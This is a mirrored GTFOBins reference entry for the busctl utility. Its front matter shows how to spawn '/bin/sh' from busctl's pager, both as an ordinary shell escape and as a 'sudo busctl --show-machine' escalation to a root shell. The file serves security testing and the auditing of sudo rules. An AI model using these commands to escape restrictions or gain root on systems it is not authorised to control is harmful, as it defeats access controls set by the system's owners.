1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 19:31:34 +01:00
GTFOBins.github.io/_gtfobins/busctl.md
2020-03-17 20:19:45 +01:00

13 lines
284 B
Markdown

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
shell:
- code: |
busctl --show-machine
!/bin/sh
sudo:
- code: |
sudo busctl --show-machine
!/bin/sh
---